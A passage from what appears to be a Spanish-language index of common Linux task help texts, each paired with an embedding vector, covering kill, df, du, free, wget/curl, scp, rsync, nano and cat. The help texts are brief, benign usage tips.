-0.02364, 0.01292, -0.01117, -0.10887, 0.0428, 0.00401, -0.03245, -0.00229, -0.11036, 0.08812, 0.0752, 0.05813, -0.08039, -0.01741, 0.02542, -0.13104, -0.05309, -0.03034, 0.10483, 0.00453, -0.02817, -0.01914, 0.00137, -0.00035, -0.03252, 0.06648, 0.00337, 0.04302, 0.00838, -0.07654, -0.02847, -0.03788, -0.03379, -0.08995, 0.10352, -0.00761, 0.02323, -0.03648, -0.01806, 0.0574, 0.01339, -0.01566, -0.05185, 0.00757, -0.01687, -0.07519, -0.05186, 0.03342, 0.00908, 0.04416, -0.10395, -0.08438, 0.04845, 0.05073, -0.0136, 0.00972, 0.09474, -0.0018, 0.0072, -0.01333, 0.03249, -0.00771, -0.0372, -0.02347, -0.01797, 0.03842, 0.06291, 0.07993, 0.08774, -0.02392, 0.06398, 0.00081, -0.07428, 0.01105, -0.00286, 0.02562, 0.03574, -0.00704, -0.01006, 0.00831, 0.08547, -0.02551, -0.02325, -0.05341, 0.02004, 0.03535, 0.00184, -0.0451, -0.02461, 0.00036, -0.00707, -0.03957, -0.02086, 0.02994, 0.06376, 0.00078, 0.05833, -0.05515, 0.04814, -0.01399, 0.04419, -0.00013, -0.04706, -0.06642, 0.03603, 0.01024, 0.00535, 0.03474, -0.035, -0.0361, -0.04971, -0.0129, -0.08876, 0.03672, -0.01193, -0.01829, -0.02527, -0.05423, 0.04227, -0.087, -0.02975, 0.02251, -0.05075, 0.00807, -0.02862, -0.01053, -0.05203, -0.01034, -0.03083]} +{"tipo": "tarea", "herramienta": "kill", "perfil": "LINUX", "fichero": "tarea comun: kill", "texto": "Para matar un proceso: usa kill. kill PID lo termina. kill -9 PID a la fuerza. pkill nombre por nombre.", "v": [-0.16401, -0.04547, -0.12867, 0.00398, -0.00901, -0.11015, -0.03292, 0.06373, -0.07887, -0.02816, 0.08808, -0.06798, 0.14341, -0.01284, -0.03015, -0.06005, -0.08201, 0.05945, 0.09209, -0.08381, -0.08294, 0.05975, 0.07568, -0.07313, -0.08499, 0.13747, 0.09635, 0.14537, -0.17693, -0.08277, -0.1144, -0.04122, 0.05929, -0.16105, -0.012, -0.02664, -0.03999, 0.07379, 0.01905, 0.19894, -0.22034, 0.11129, 0.00164, 0.02255, -0.02238, -0.02844, -0.06398, 0.13861, 0.09368, 0.12209, 0.03768, 0.00386, -0.06408, -0.10732, 0.04509, 0.00835, -0.06985, -0.07019, -0.07823, 0.06436, -0.1509, 0.02574, 0.04473, 0.02251, 0.04713, -0.01962, -0.01464, -0.07367, 0.02569, 0.12679, 0.01112, -0.027, -0.00483, 0.07057, -0.00016, -0.09139, 0.01905, 0.03355, 0.07054, 0.00363, -0.13156, -0.11198, -0.14538, -0.06014, -0.00334, 0.02354, -0.04565, -0.07628, -0.02326, -0.1117, -0.00209, -0.06703, 0.05012, 0.07549, 0.09688, -0.007, 0.07682, 0.00536, -0.04265, -0.00803, 0.10845, -0.07861, -0.12023, 0.0093, 0.00714, -0.07225, -0.0581, 0.065, 0.02747, 0.02666, 0.00043, -0.00212, 0.01747, 0.00245, -0.05287, -0.03208, 0.03113, -0.00186, 0.05555, -0.04429, 0.00497, 0.08025, 0.06961, 0.02391, -0.03908, -0.10844, 0.04371, 0.01361, 0.05152, -0.07778, 0.0017, 0.00343, 0.07227, -0.07409, 0.00658, 0.00809, 0.17568, -0.0326, 0.03366, -0.01327, 0.05543, -0.04356, -0.01583, -0.02422, 0.04524, -0.02094, -0.0598, -0.04213, 0.04554, 0.10603, 0.00318, -0.03894, -0.02289, -0.01235, -0.11619, -0.01802, -0.00035, -0.04335, 0.01268, 0.04216, -0.0112, 0.0329, -0.01633, -0.05346, -0.02673, 0.01014, 0.01342, -0.08705, 0.04103, -0.04065, 0.12342, -0.01305, -0.02536, 0.01713, 0.00083, -0.01024, 0.0457, -0.02327, -0.09995, 0.0191, -0.01346, 0.00313, -0.07373, 0.04871, -0.01995, -0.01792, 0.03287, -0.0027, 0.00202, 0.02945, -0.04941, 0.09372, -0.01122, 0.00806, -0.01086, 0.06734, -0.02456, 0.00688, 0.01051, -0.03833, 0.01709, -0.05859, 0.00789, 0.03867, 0.04732, -0.00214, 0.06761, 0.04053, -0.06354, -0.03531, -0.00668, -0.02941, 0.05315, 0.00871, 0.00445, -0.04655, -0.0343, -0.05498, 0.0656, -0.03455, -0.07911, 0.02226, -0.00094, 0.00149, -0.03981, -0.03103, -0.00641, -0.02927, 0.00336, -0.04512, -0.05487, 0.00777, 0.01088, 0.01465, -0.03194, -0.00047, 0.01627, 0.00348, -0.06538, -0.00571, 0.00266, 0.00998, -0.0277, 0.00264, -0.00447, 0.02593, -0.00434, 0.02005, -0.02524, -0.05588, -0.03659, -0.02665, -0.07069, -0.02577, -0.06052, -0.01476]} +{"tipo": "tarea", "herramienta": "df", "perfil": "LINUX", "fichero": "tarea comun: df", "texto": "Para ver el espacio libre en disco: usa df. df -h muestra el espacio por particion.", "v": [0.01206, -0.16713, -0.10351, -0.01273, -0.14956, 0.00803, -0.03281, -0.15039, -0.02312, -0.00398, 0.00065, -0.1161, -0.22078, -0.10639, -0.0036, -0.07375, 0.14571, 0.08319, -0.05515, -0.07989, -0.04376, -0.00252, -0.07389, -0.03824, 0.05997, -0.14329, -0.02824, -0.04917, -0.19269, 0.01257, 0.15163, 0.01098, -0.03544, -0.0801, 0.08195, -0.12736, 0.11906, 0.03562, 0.16488, 0.00583, -0.03352, 0.10638, -0.02348, 0.13686, -0.04713, -0.09847, -0.02261, -0.01244, -0.02373, 0.08186, -0.05024, -0.01122, 0.01482, 0.04986, 0.0794, -0.12404, 0.00363, -0.02902, -0.02116, 0.11117, -0.06837, 0.05846, -0.02745, -0.00956, 0.05762, 0.078, 0.00895, -0.02584, -0.02967, 0.09872, -0.10406, -0.05308, 0.11972, -0.15146, -0.0481, 0.06677, 0.01302, -0.04712, -0.0625, 0.00715, 0.04848, -0.00741, -0.07602, -0.03065, -0.05605, -0.03435, 0.10755, -0.02704, -0.0669, 0.08024, -0.0013, 0.02477, -0.0414, 0.06478, 0.05962, -0.05813, -0.07186, 0.15036, -0.0257, 0.01566, 0.12419, 0.05639, -0.09144, -0.07734, 0.0487, 0.02142, 0.02319, -0.08518, -0.02975, 0.01868, 0.13415, -0.02275, -0.01958, -0.11036, -0.11084, -0.03902, 0.02484, 0.09043, -0.04245, 0.04902, -0.01904, 0.03048, -0.05064, 0.00369, -0.05748, -0.06575, 0.05256, 0.01197, -0.10507, -0.03585, 0.00853, -0.04167, -0.00214, 0.03866, 0.03438, -0.038, -0.00579, 0.04948, -0.01275, -0.02173, 0.05947, 0.10712, -0.05442, 0.03022, -0.01344, 0.05326, 0.02012, -0.01594, -0.01026, 0.05112, -0.01661, 0.0237, -0.01087, 0.01132, -0.02272, 0.0643, 0.02763, -0.01778, -0.07199, -0.1311, -0.03796, 0.02749, -0.05003, 0.01133, -0.01427, -0.03271, 0.0517, -0.01918, -0.01707, 0.02828, -0.09354, 0.0274, -0.00292, -0.02991, 0.01024, -0.0385, 0.03076, -0.08876, 0.01548, -0.03035, 0.02403, 0.00559, -0.03046, -0.05515, 0.01184, -0.08381, 0.04818, -0.04789, 0.03542, 0.04481, 0.02428, -0.02478, -0.03266, -0.02773, -0.02243, -0.01738, -0.06252, -0.03615, -0.00915, 0.05172, -0.06597, -0.0383, 0.02049, 0.01998, 0.01594, -0.01448, 0.03425, 0.08832, -0.04699, -0.02786, 0.07239, -0.04861, 0.01826, -0.018, -0.08496, 0.03123, 0.02242, 0.0294, 0.00594, 0.00904, -0.01688, 0.05789, 0.02419, -0.0612, -0.03824, 0.01037, 0.0008, 0.01093, 0.07034, 0.06966, -0.01133, 0.02265, -0.01259, -0.01243, 0.03354, -0.01862, 0.06328, 0.00191, -0.03409, -0.08502, 0.02356, 0.05507, -0.0896, 0.00899, -0.01326, 0.01998, -0.08245, 0.00939, 0.01694, -0.03295, -0.00747, -0.00425, -0.03778, -0.10212, -0.00938, 0.05207]} +{"tipo": "tarea", "herramienta": "du", "perfil": "LINUX", "fichero": "tarea comun: du", "texto": "Para ver cuanto ocupa una carpeta: usa du. du -sh carpeta/ el tamaño total.", "v": [0.16285, -0.0379, -0.14055, 0.04691, -0.02448, -0.18595, 0.08731, -0.0347, -0.09877, -0.07184, -0.18704, -0.15733, -0.01234, 0.04786, -0.02284, 0.00318, 0.04375, -0.00379, 0.07276, -0.09205, 0.08563, -0.03877, 0.09689, -0.01181, -0.1991, 0.07434, 0.12232, 0.01975, -0.08357, 0.07353, 0.08067, 0.18247, 0.02247, -0.06718, 0.00899, 0.023, -0.03799, -0.1309, -0.05212, -0.00663, 0.12249, 0.17147, -0.03856, 0.04666, 0.0999, 0.01097, -0.00109, 0.01997, -0.19613, -0.00302, -0.08469, 0.03193, 0.01445, -0.01909, 0.02951, -0.07046, 0.02486, -0.0645, 0.06727, 0.01604, 0.01499, 0.05546, -0.09007, 0.10464, 0.04182, -0.0539, 0.0319, -0.02848, -0.04282, 0.01439, -0.03528, 0.03843, -0.02102, -0.00781, -0.04719, 0.08604, -0.046, -0.13319, -0.09926, -0.06034, 0.00083, 0.00319, -0.07994, -0.02894, -0.05436, -0.09309, 0.00708, -0.02479, -0.01788, 0.00203, 0.02347, -0.03348, -0.1149, 0.00549, -0.02223, -0.0223, -0.06632, 0.09363, 0.00862, 0.03659, 0.03116, 0.03624, -0.09102, 0.06941, -0.05252, 0.02898, -0.06119, -0.03999, -0.05903, -0.07419, 0.14296, 0.02394, 0.01127, 0.10746, -0.1627, -0.09453, 0.01863, 0.04202, -0.05856, -0.02116, -0.09522, 0.03073, -0.04362, 0.1366, 0.05986, -0.08404, 0.00465, 0.03872, 0.00016, 0.00623, -0.08917, 0.03755, -0.05998, -0.10492, 0.0193, 0.05226, -0.10077, -0.00272, 0.07537, -0.01263, 0.02247, 0.0604, -0.02462, -0.03388, 0.02618, 0.05885, 0.07367, -0.02803, -0.02531, -0.01295, 0.11158, 0.0402, 0.05912, -0.00869, 0.08535, 0.03598, 0.01511, -0.05833, -0.04766, -0.03011, -0.02629, -0.08422, 0.06645, 0.06645, -0.00727, -0.01923, -0.04304, -0.02813, 0.07396, 0.09361, -0.03528, 0.0042, -0.02254, -0.02499, -0.03481, -0.02618, 0.08406, -0.04269, 0.00118, 0.01688, 0.05383, -0.00601, -0.02245, 0.05055, -0.06422, -0.0239, 0.09408, -0.01131, -0.01929, 0.02055, 0.03408, 0.1181, 0.02276, 0.03032, -0.0208, 0.00282, -0.00959, -0.04528, -0.01467, -0.01316, -0.04592, 0.02742, -0.05956, -0.01533, 0.05403, 0.03186, -0.03982, 0.02167, -0.06684, 0.07061, 0.04084, 0.0044, -0.01627, -0.04288, -0.04183, -0.02024, 0.01633, 0.06215, 0.04375, -0.00985, 0.03709, 0.05981, 0.01191, -0.00296, 0.01552, 0.00389, 0.02877, -0.00357, 0.02597, 0.0429, -0.02605, 0.043, 0.00239, -0.03139, 0.03975, -0.00495, 0.02384, -0.0154, -0.05169, -0.02641, -0.0068, 0.00017, -0.08405, -0.00524, -0.01626, 0.00106, -0.01833, 0.03619, -0.03813, -0.0674, 0.01539, -0.01638, 0.00549, -0.08591, 0.00121, -0.01555]} +{"tipo": "tarea", "herramienta": "free", "perfil": "LINUX", "fichero": "tarea comun: free", "texto": "Para ver la memoria libre: usa free. free -h muestra RAM y swap.", "v": [0.0025, -0.01558, -0.19226, -0.12626, -0.15919, -0.00988, -0.10815, -0.07241, -0.07519, -0.01616, -0.08935, -0.1016, 0.09617, 0.00123, 0.04002, 0.09267, 0.01227, 0.0973, 0.00111, 0.01929, 0.04633, -0.04145, -0.06006, -0.08506, -0.08784, 0.02659, 0.02295, 0.01071, -0.08363, 0.03048, 0.15222, 0.00918, 0.12466, -0.08972, 0.01692, -0.03455, 0.19999, -0.06497, 0.13394, 0.04559, 0.11757, 0.02333, -0.03165, 0.08694, 0.07919, -0.07359, -0.08025, 0.04908, 0.03065, 0.0201, -0.03955, 0.0263, -0.00177, 0.0006, 0.11897, -0.02605, 0.04783, -0.01004, -0.07325, 0.04902, 0.03992, 0.12349, 0.15347, 0.01232, 0.09628, -0.01474, -0.05668, 0.01455, -0.03477, 0.13954, -0.03804, -0.01235, 0.03746, -0.03978, -0.03995, 0.08041, -0.02714, 0.0049, 0.00849, 0.08319, -0.00332, -0.02378, -0.0199, 0.02698, 0.02548, 0.04364, 0.05253, -0.04442, 0.04037, 0.10682, 0.05535, 0.10724, -0.04233, 0.17355, 0.13982, -0.04989, -0.08458, 0.18752, 0.13151, 0.13578, 0.11629, 0.0071, -0.06708, 0.07266, 0.06967, 0.002, 0.01122, 0.04627, -0.04002, -0.03753, 0.06954, -0.04641, -0.03993, 0.0382, -0.11436, 0.02838, 0.07849, 0.09854, 0.06179, 0.07564, -0.01629, -0.05022, -0.04121, 0.05319, -0.07039, -0.00577, -0.01096, 0.09217, -0.0796, 0.09148, 0.03639, 0.04405, -0.00523, -0.12787, -0.01875, 0.00031, 0.08248, 0.05058, -0.01337, -0.0044, 0.0084, 0.06456, -0.00961, -0.03118, -0.01893, -0.04562, 0.05063, 0.05874, -0.01351, -0.02513, 0.00749, 0.00293, 0.06847, 0.06762, 0.03696, -0.00529, 0.03523, -0.04642, -0.06406, -0.00969, -0.0727, 0.02286, -0.06868, 0.00047, -0.05691, 0.01451, -0.04007, 0.04716, 0.01439, 0.04547, -0.0073, -0.02797, 0.00259, -0.04225, 0.02469, 0.01012, -0.03422, -0.06587, -0.02397, -0.07033, 0.02299, 0.03575, -0.06181, 0.0066, -0.09369, -0.07193, 0.0003, 0.01828, 0.0807, 0.00037, -0.00413, 0.01579, 0.0744, 0.00827, 0.06497, -0.022, -0.04562, -0.04996, -0.00752, 0.01898, -0.08984, 0.02362, -0.01544, -0.00497, -0.00225, 0.02321, 0.03731, 0.04963, -0.00235, 0.033, 0.01633, -0.02727, 0.0578, -0.03982, -0.09576, 0.0219, -0.00877, -0.009, -0.01048, -0.01845, 0.05916, 0.08312, 0.06118, -0.00333, -0.04894, 0.01325, 0.00279, 0.03133, -0.007, 0.00804, -0.08457, 0.0968, -0.01914, -0.04507, 0.0842, 0.03431, -0.03372, -0.00366, -0.03074, -0.01585, 0.04596, 0.02484, -0.11, -0.02052, -0.04597, -0.01611, -0.03342, 0.00512, 0.04076, -0.07628, -0.02583, 0.04374, -0.00131, -0.06013, -0.0577, -0.01658]} +{"tipo": "tarea", "herramienta": "wget", "perfil": "LINUX", "fichero": "tarea comun: wget", "texto": "Para descargar un fichero de internet: usa wget. wget URL descarga. curl -O URL tambien. curl -L sigue redirecciones.", "v": [0.0016, -0.09909, -0.03413, -0.09596, 0.04122, -0.14224, -0.0728, 0.03404, 0.12919, -0.03884, -0.18735, -0.26397, -0.00881, -0.09923, -0.01489, -0.10504, -0.11288, 0.0637, 0.14104, -0.18218, -0.00033, 0.12626, -0.09454, -0.14966, -0.11865, 0.0187, 0.0294, -0.06413, -0.0335, -0.096, 0.03597, 0.04139, 0.01687, 0.03413, -0.14858, 0.0503, 0.04836, 0.04825, 0.0418, 0.01237, 0.03147, 0.01366, -0.13635, 0.17539, 0.00219, -0.05179, 0.02833, -0.01279, 0.05125, -0.01153, 0.12229, -0.01697, -0.07927, -0.01539, -0.08264, -0.00372, 0.06686, -0.17425, -0.00869, -0.00024, 0.01155, -0.05031, 0.01238, 0.08376, -0.03774, 0.0347, -0.02028, 0.03033, -0.16016, 0.01253, 0.10325, 0.04649, 0.01373, -0.01685, -0.00923, 0.03987, 0.00549, -0.10638, 0.04912, 0.00059, -0.07357, 0.00175, 0.08144, 0.02498, -0.08805, -0.03173, 0.01439, -0.09357, -0.02221, 0.00061, 0.04385, 0.03594, -0.01858, -0.03172, -0.03077, -0.07026, -0.11078, -0.04603, 0.05063, -0.05222, -0.06565, 0.13134, -0.04326, 0.0579, 0.06524, 0.01563, -0.01408, 0.03145, -0.03656, 0.03391, 0.04144, -0.02695, -0.00513, 0.04819, 0.0144, -0.02985, 0.0289, -0.02038, -0.03838, -0.11312, -0.04551, -0.02001, -0.02641, 0.02119, -0.05427, 0.01584, 0.029, 0.05645, -0.11631, -0.0862, 0.00376, -0.07973, -0.03911, -0.00924, 0.03045, 0.01516, 0.07116, -0.05038, -0.029, -0.01448, -0.01337, -0.0605, -0.13562, 0.03146, 0.03605, 0.02547, 0.01879, 0.01014, -0.00729, 0.01261, 1e-05, 0.07815, 0.01704, -0.12957, 0.02825, 0.00964, 0.07104, -0.04991, -0.0132, -0.00197, 0.00421, 0.03817, 0.09333, -0.03865, -0.1117, 0.04401, -0.06056, 0.04643, 0.04897, 0.03278, -0.04618, 0.02506, -0.10695, -0.09852, 0.03599, -0.04083, -0.01547, -0.01046, 0.00925, 0.02278, -0.00141, -0.04679, 0.02966, 0.03302, -0.08358, -0.01834, 0.0337, -0.01017, -0.06759, 0.02062, -0.04768, -0.07622, -0.02325, 0.09468, 0.12994, 0.0308, -0.00014, -0.06201, -0.03699, -0.01164, -0.08961, -0.06454, -0.02187, -0.00742, -0.00863, -0.00936, 0.10454, -0.04671, -0.06537, 0.00488, 0.0194, -0.0033, 0.03324, -0.04344, -0.01845, -0.01838, 0.04776, 0.04023, 0.04291, -0.02896, -0.05248, 0.00645, -0.01809, 0.07462, 0.03853, 0.03566, -0.01178, -0.02035, -0.00872, 0.04905, 0.01114, 0.00318, 0.03322, -0.04575, -0.06842, -0.01385, -0.03366, 0.06972, -0.05171, 0.01843, -0.03611, -0.00191, -0.0101, 0.0044, -0.00647, -0.02414, -0.05298, -0.06014, 0.0195, -0.04392, -0.04293, -0.02664, -0.03859, -0.00028, -0.01517, 0.04414]} +{"tipo": "tarea", "herramienta": "scp", "perfil": "LINUX", "fichero": "tarea comun: scp", "texto": "Para copiar ficheros a un servidor: usa scp. scp fichero usuario@servidor:/ruta lo sube. scp -r para carpetas.", "v": [0.22543, -0.20188, -0.20015, -0.10135, -0.01103, -0.40999, 0.06956, -0.15368, 0.05564, 0.07843, -0.07237, -0.00053, 0.02563, -0.17403, -0.02146, -0.00122, -0.01197, 0.05248, 0.04111, 0.02559, 0.08924, 0.07088, 0.10798, 0.01251, -0.07521, 0.05338, 0.09856, 0.01012, 0.0201, -0.10596, 0.1013, 0.14441, 0.07505, -0.00439, -0.004, -0.04895, -0.01258, -0.04326, -0.04103, 0.03686, 0.11749, 0.04077, -0.16073, 0.02065, -0.02126, -0.03105, 0.00434, -0.039, 0.01424, 0.01218, -0.03146, -0.10959, -0.14961, -0.04483, -0.0862, 0.07426, 0.07421, -0.04786, 0.07588, 0.02929, -0.03141, 0.09142, -0.04367, -0.01452, 0.05723, -0.02931, 0.01267, -0.12114, -0.07742, 0.01951, -0.13952, 0.05647, 0.04858, -0.02166, 0.08285, 0.02325, -0.02217, -0.04446, 0.05226, 0.02976, -0.00417, -0.00417, -0.10031, 0.03765, -0.05449, -0.07971, 0.08444, 0.03541, 0.01102, -0.00503, 0.08515, 0.04216, -0.03765, 0.09213, -0.01517, -0.06707, -0.0029, -0.03068, 0.0727, 0.04482, 0.0502, 0.0567, -0.06648, 0.09221, -0.02222, 0.05909, 0.07978, -0.02531, 0.02767, -0.02023, 0.08383, 0.03202, -0.04117, -0.01622, -0.05459, -0.07038, 0.0122, 0.00086, 0.01924, -0.01164, -0.09619, -0.02546, -0.04051, 0.01287, 0.01833, -0.01933, 0.04287, 0.03588, -0.04364, -0.00969, -0.10501, -0.00097, -0.09205, -0.02673, -0.00654, 0.0178, -0.01761, 0.00408, -0.02669, -0.03756, 0.02042, 0.03499, -0.08829, 0.02322, 0.02136, -0.01017, 0.03995, -0.09893, -0.0439, -0.00669, 0.07863, -0.02605, -0.07181, -0.01522, -0.00908, 0.06052, 0.02088, -0.09625, -0.05424, 0.08545, 0.01444, 0.02019, 0.01285, 0.04595, -0.00208, 0.00669, -0.00743, -0.00201, 0.02669, 0.01706, -0.02663, 0.0048, 0.01595, -0.07032, 0.04132, -0.06513, -0.02268, -0.02545, 0.01993, 0.04339, -0.0428, 0.01696, -0.0101, 0.02757, -0.06331, -0.017, 0.02596, 0.00792, 0.00985, -0.00507, 0.02488, 0.02304, 0.01769, 0.02706, -0.02486, -0.05953, -0.0024, -0.00423, -0.01548, -0.03065, -0.04838, 0.00657, -0.0405, -0.0637, -0.00204, -0.01538, -0.00033, 0.03055, -0.01806, 0.00227, 0.01845, -0.00801, 0.10053, -0.04772, -0.00088, 0.00045, 0.02825, 0.03112, 0.02496, -0.07132, -0.02173, 0.05902, 0.03171, 0.00567, 0.00267, 0.02457, 0.00612, -0.04578, 0.01629, 0.01551, -0.02055, 0.02794, 0.02938, -0.03477, 0.07651, -0.00848, -0.00852, -0.02754, -0.04938, -0.05773, -0.03204, 0.05064, -0.03849, -0.03868, -0.00921, -0.02612, -0.02825, 0.01186, -0.01938, -0.0562, -0.01426, -0.06045, 0.04207, -0.04376, -0.02064, -0.07701]} +{"tipo": "tarea", "herramienta": "rsync", "perfil": "LINUX", "fichero": "tarea comun: rsync", "texto": "Para sincronizar carpetas: usa rsync. rsync -av origen/ destino/ copia solo lo cambiado. -z comprime en red.", "v": [0.0686, -0.143, -0.17351, 0.04465, 0.16398, -0.15032, 0.07339, -0.00741, -0.13022, -0.0004, -0.0166, -0.23805, -0.0036, -0.06462, 0.06175, 0.02507, -0.07222, 0.19712, -0.00097, -0.05891, 0.06291, -0.09436, 0.11081, -0.13197, -0.04051, 0.06724, 0.04289, -0.05988, -0.09554, 0.01007, 0.06571, 0.12015, 0.16439, -0.01344, -0.04065, -0.10509, 0.0171, 0.05951, 0.03114, 0.09821, 0.03295, 0.03992, -0.09432, 0.11209, -0.05047, -0.06215, 0.01561, 0.06886, -0.11109, -0.03658, 0.01558, -0.07738, -0.16293, -0.07052, 0.05493, -0.08546, 0.06095, -0.00945, 0.02961, 0.08921, 0.09943, 0.02886, 0.04103, 0.05783, -0.02264, -0.00523, -0.06778, -0.0451, 0.0025, 0.01918, -0.03191, 0.07344, 0.08533, -0.14271, 0.0689, -0.01899, 0.01668, -0.12763, 0.01673, 0.01363, 0.00293, 0.06466, -0.07878, -0.03608, -0.00994, -0.10593, 0.07918, 0.02679, -0.06005, -0.02461, 0.09851, -0.07062, -0.01364, 0.02846, -0.03564, -0.02366, -0.0604, -0.05382, -0.00035, 0.02392, 0.08389, 0.04102, 0.00083, 0.06322, -0.04327, 0.09514, 0.00432, -0.06186, -0.02474, 0.01006, 0.01432, 0.01184, 0.0834, -0.00122, -0.0712, -0.00317, -0.04386, 0.01102, -0.01918, -0.0436, -0.06948, -0.07253, -0.00413, -0.07057, 0.00926, -0.04235, 0.05594, 0.09063, 0.00761, -0.02562, -0.04472, 0.05682, 0.0054, -0.02103, -0.02395, 0.02452, -0.03827, -0.02908, 0.06666, -0.07175, 0.01935, 0.08073, -0.03918, -0.01546, 0.0151, 0.07107, 0.09293, -0.13203, -0.14881, 0.00017, 6e-05, 0.04892, 0.03237, -0.01799, -1e-05, 0.09761, 0.02897, -0.06501, -0.01087, -0.01506, -0.01219, -0.01793, 0.00842, -0.02078, -0.04918, -0.00849, -0.02392, -0.02604, 0.03915, 0.05522, -0.06587, 0.04173, 0.00413, -0.03989, -0.04181, -0.05929, 0.00835, -0.05805, 0.00254, 0.00702, 0.07207, 0.04603, -0.02073, 0.00049, -0.00977, -0.05864, 0.02234, 0.05692, -0.00958, -0.02248, 0.07923, 0.02662, 0.035, 0.01279, 0.01294, 0.00903, 0.0031, -0.05818, -0.05016, -0.00354, -0.06835, 0.02263, 0.00342, -0.0277, 0.0742, 0.0119, -0.00338, 0.06436, -0.11982, 0.10394, -0.03226, -0.02452, 0.03645, -0.01446, -0.05441, -0.07036, 0.01482, -0.03281, -0.00742, -0.01977, 0.05575, 0.05668, 0.05529, 0.02896, -0.00737, 0.01457, 0.0353, -0.01672, 0.06431, 0.0487, -0.01581, 0.06432, -0.01903, -0.01985, 0.04197, 0.05996, 0.04643, 0.00103, -0.06484, -0.06742, -0.04409, -0.00884, -0.09004, -0.02518, -0.03825, -0.03958, -0.12969, 0.00857, 0.04418, -0.0627, -0.00749, 0.01912, 0.00971, -0.09706, 0.03322, -0.04749]} +{"tipo": "tarea", "herramienta": "nano", "perfil": "LINUX", "fichero": "tarea comun: nano", "texto": "Para editar un fichero de texto: usa nano. nano fichero (facil) o vim fichero. Ctrl+O guarda y Ctrl+X sale en nano.", "v": [-0.04216, -0.13687, -0.16036, -0.05815, 0.02096, -0.18141, -0.07637, -0.02945, -0.06146, -0.04157, 0.03309, -0.17321, -0.07883, -0.06727, 0.00806, 0.01005, 0.04439, -0.04564, 0.07653, 0.09196, -0.11981, -0.01942, -0.11105, -0.07128, -0.05932, 0.05642, -0.05473, -0.00701, -0.13686, 0.01238, 0.12475, 0.02504, 0.14224, -0.07023, -0.00324, 0.08568, 0.03917, -0.18037, -0.10328, 0.07445, -0.00143, 0.12333, -0.12218, 0.11245, -0.01098, -0.12872, 0.01956, -0.03963, 0.08532, 0.04783, 0.09305, -0.03171, -0.13209, -0.00892, -0.12111, 0.01454, 0.1955, -0.01865, -0.0207, 0.07154, 0.00648, 0.04824, 0.11167, 0.03027, -0.15098, -0.05045, 0.05435, -0.08101, -0.11771, 0.10944, -0.124, 0.03093, 0.00182, 0.04532, -0.06553, 0.03704, 0.01755, -0.09978, 0.09037, 0.04899, -0.08543, 0.03834, -0.11218, -0.03253, -0.05509, -0.01084, -0.00615, -0.0251, -0.11522, -0.02116, -0.01556, -0.01306, 0.06595, -0.09164, 0.01095, -0.07086, -0.03985, -0.07852, -0.00339, 0.02348, 0.04474, -0.04369, -0.04732, 0.01817, 0.02981, 0.09864, -0.07539, -0.01295, -0.03151, 0.00461, 0.09872, 0.0021, 0.05181, -0.02377, 0.02039, -0.04733, 0.11183, 0.01539, 0.00264, -0.10483, -0.08613, -0.0258, -0.03318, 0.0733, -0.02061, -0.08631, -0.01346, 0.01029, -0.10131, -0.08518, -0.05448, -0.01971, -0.11832, -0.06481, 0.01311, 0.04021, 0.08755, 0.03738, -0.07442, 0.00961, 0.03114, 0.12751, -0.00327, -0.02874, -0.03196, 0.07365, -0.0159, 0.11009, 0.01663, 0.0387, 0.0406, -0.02749, -0.02394, 0.02225, -0.00436, -0.01421, -0.0055, -0.00444, -0.0052, -0.05771, -0.04636, 0.06101, -0.01121, -0.0059, -0.00603, 0.03242, -0.01032, -0.04014, 0.03312, 0.02293, -0.10956, 0.04181, 0.02956, -0.06101, 0.0761, -0.01526, 0.07388, 0.02492, 0.02038, -0.02107, -0.0071, 0.06537, -0.03804, 0.05781, -0.04485, -0.01101, 0.01383, -0.03407, -0.00971, -0.03254, -0.02499, 0.02615, 0.02617, -0.0089, 0.01148, -0.03173, -0.05968, -0.06287, -0.027, -0.04457, -0.01021, 0.00074, 0.05036, -0.04951, 0.03424, 0.04782, -0.01, 0.0094, -0.03625, 0.01422, 0.02552, 0.01409, -0.01877, 0.0603, -0.06148, 0.03215, -0.02639, 0.01323, -0.00058, -0.00185, 0.0362, 0.01231, 0.09052, -0.00368, 0.05793, 0.01614, 0.00504, 0.01654, -0.04215, -0.00791, -0.04456, -0.02124, 0.03237, -0.0383, 0.04767, 0.02481, -0.01724, -0.00467, -0.06765, -0.07251, 0.00756, 0.05573, -0.03259, -0.02568, 0.00548, 0.01878, -0.06409, 0.03082, 0.03561, -0.08759, 0.01832, -0.08083, 0.02333, -0.03968, 0.02592, 0.01189]} +{"tipo": "tarea", "herramienta": "cat", "perfil": "LINUX", "fichero": "tarea comun: cat", "texto": "Para ver el contenido de un fichero: usa cat. cat fichero. less fichero para leer largo. head/tail para principio/final.", "v": [-0.01528, -0.09878, -0.10245, 0.027, 0.12525, -0.18272, -0.07823, 0.12238, 0.01279, 0.01732, 0.01093, -0.09645, -0.09912, 0.03313, 0.05096, -0.01996, -0.03276, -0.05721, 0.05925, -0.20672, -0.0881, 0.01576, -0.04995, -0.08797, -0.07839, 0.04195, 0.11348, 0.11008, -0.11641, -0.01559, 0.20034, 0.17723, 0.12018, -0.00483, -0.03124, 0.01149, 0.05957, -0.10702, -0.1861, 0.10907, 0.05217, 0.04034, -0.06955, 0.18444, -0.07666, -0.18921, 0.00475, 0.09919, 0.13177, 0.09225, 0.16214, -0.06501, 0.02575, 0.08104, -0.0319, 0.00433, 0.06171, -0.04723, 0.06233, -0.00438, -0.09582, -0.01044, 0.05168, 0.01363, 0.00446, -0.02887, 0.07869, 0.01164, 0.05104, 0.04774, -0.00406, 0.02184, 0.03954, -0.05062, -0.09656, 0.02504, -0.00022, -0.06557, 0.05104, 0.03697, -0.08816, -0.05476, -0.0662, 0.03029, -0.06613, -0.02686, 0.08825, -0.03616, 0.05414, -0.08203, 0.01187, 0.06559, -0.03729, -0.05514, -0.02806, 0.01232, -0.09519, 0.01528, -0.04327, -0.02377, 0.00951, 0.02058, -0.00317, 0.03247, 0.06286, 0.04392, 0.01045, -0.03534, -0.01356, -0.01114, 0.02467, -0.02058, 0.09283, 0.04086, -0.05719, -0.03592, 0.03038, 0.07819, 0.09032, -0.13491, -0.05401, 0.03025, -0.03008, 0.09267, 0.03941, -0.12103, 0.02034, 0.01396, -0.00733, 0.01442, -0.06708, -0.0043, -0.15684, 0.01517, 0.02829, 0.07758, 0.05975, 0.0867, -0.08023, 0.02974, 0.04173, 0.01055, -0.09048, 0.10033, 0.00506, -0.06604, -0.01617, 0.01462, -0.00406, -0.01453, 0.02651, 0.00216, 0.01831, -0.08088, 0.00629, 0.00801, 0.00312, 0.00311, 0.08675, 0.00515, 0.08671, 0.05721, 0.05037, -0.01364, -0.04523, 0.00635, -0.08132, 0.00129, -0.0048, 0.02688, -0.05971, -0.01843, -0.00545, -0.04021, 